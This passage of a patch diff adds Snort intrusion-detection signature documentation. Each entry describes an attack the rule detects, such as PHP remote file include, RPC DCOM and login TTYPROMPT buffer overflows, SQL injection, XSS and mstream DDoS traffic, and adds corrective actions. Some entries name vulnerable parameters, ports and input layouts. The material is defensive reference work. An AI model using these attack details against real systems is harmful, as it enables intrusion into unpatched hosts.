+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000372.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000372
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_styles.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_styles.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2194.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2194
+
+--
+Summary:
+This event is generated when an attempt is made to access CSMailto.cgi on an internal web server. This may indicate an attempt to exploit an input validation vulnerability in a form mail script distributed by CGIScript.NET.
+
+--
+Impact:
+Remote execution of arbitrary code and information disclosure.
+
+--
+Detailed Information:
+CSMailto.cgi is a Perl script that manages multiple email forms. An attacker can use a specially crafted URL to execute shell commands on the server and/or email files from the server to a remote email address.
+
+--
+Affected Systems:
+Any web server running CGIScript.NET CSMailto.cgi.
+
+--
+Attack Scenarios:
+An attacker places shell code in a URL sent to CSMailto.cgi on the web server. The server then executes the code.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses CSMailto.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is unknown if this vulnerability has been fixed. Contact the vendor, CGIScript.NET (http://www.cgiscript.net) for more information. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4579
+
+--
--- /dev/null
+++ b/doc/signatures/112-1.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
+network traffic that may constitute an attack. Specifically a directed
+arp request was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/534.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+534
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3436.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3436
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/248.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+248
+
+--
+Summary:
+This event is generated when an mstream DDoS handler responds to an mstream client.
+
+--
+Impact:
+Severe.  If the list source IP is in your network, it may be an mstream handler.  If the listed destination IP is in your network, it may be an mstream client.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to inform them to launch attacks.  A client may communicate with a handler using a TCP packet to destination port 12754 with a string of ">" in the payload.  A handler responds to this with a TCP source port of 12754 and a string of ">" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+An mstream handler may be respond to a communication from an mstream client.
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 12754.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
--- /dev/null
+++ b/doc/signatures/2607.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2607
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "comment_on_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck634.html
+
+--
--- /dev/null
+++ b/doc/signatures/641.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 641
+
+--
+Summary: 
+This event is generated when a buffer overflow attack is attempted against a target machine.
+
+--
+Impact: 
+Serious. The attacker may be able to gain remote access to the system or have the ability to execute arbitrary code with the privileges of a system user.
+
+
+-- 
+Detailed Information: 
+This rule tracks the bit combination which may occur in network packets aimed at overflowing Digital UNIX network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS352
+
+--
--- /dev/null
+++ b/doc/signatures/106-3.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+106-3
+
+--
+Summary:
+This event is generated when the pre-processor spp_rpc_decode detects
+network traffic that may constitute an attack. Specifically a large rpc
+record fragment was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_rpc_decode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/122-16.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-16
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+filtered distributed protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/100000783.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000783
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "ATutor" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "show_courses" parameter in the "create_course.php" script used by the "ATutor" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using ATutor
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/1230.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1230
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000862.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000862
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "FlushCMS" application running on a webserver. Access to the file "class.rich.php" using a remote file being passed as the "class_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "class_path" parameter in the "class.rich.php" script used by the "FlushCMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using FlushCMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2175.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+file via SMB. 
+
+--
+Impact:
+Serious. This file contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a file
+containing important operating system information using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this file is accessible via SMB the attacker can manipulate the
+operating system registry settings.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+Microsoft Technet
+http://support.microsoft.com/support/kb/articles/q153/1/83.asp
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0562
+Winreg
+http://www.rutherfurd.net/python/winreg/
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000617.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000617
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "link_sponsored_listing.php" using a remote file being 
+passed as the "admin_template_path" parameter may indicate that an exploitation 
+attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"link_sponsored_listing.php" script used by the "Indexu" application running on 
+a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3274.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3274
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+buffer overflow vulnerability affecting "login" via Telnet.
+
+--
+Impact:
+Serious. Unauthorized administrative access to the target host.
+
+--
+Detailed Information:
+The login binary is used when establishing an interactive session on a
+system. It is used locally and by protocols that allow remote access. A
+buffer overflow condition exists in some versions of login that can be
+triggered by the manipulation of environment variables.
+
+This event is generated when an attempt is made to overflow login via
+telnet by manipulating the TTYPROMPT environment variable.
+
+--
+Affected Systems:
+	Systems using Sys V derived login
+
+--
+Attack Scenarios:
+An attacker can overflow a buffer by inserting 6 bytes of data followed
+by 65 characters and a newline into the TTYPROMPT variable.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/917.txt
@@ -0,0 +1,62 @@
+SID:
+917
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
--- /dev/null
+++ b/doc/signatures/2302.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2302
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2279.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2279
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application MediaWiki running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code and unauthorized administrative
+access to the target system.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application MediaWiki . This application
+does not perform stringent checks when handling user input, this may 
+lead to the attacker being able to execute PHP code and include php files 
+of the attackers choosing.
+
+--
+Affected Systems:
+	MediaWiki MediaWiki-stable 20031107
+	MediaWiki MediaWiki-stable 20030829
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator 
+by supplying input of their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1287.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1287
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000531.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000531
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "BtitTracker" application running on a webserver. Access 
+to the file "torrents.php" with SQL commands being passed as the "by" parameter 
+may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "by" parameter in the "torrents.php" script used by the 
+"BtitTracker" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BtitTracker
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3075.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+3075
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the several commands of an IMAP service. This
+event is concerned with data supplied as a parameter to the
+"unsubscribe" command.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow
+and the subsequent execution of arbitrary code on a vulnerable server.
+
+--
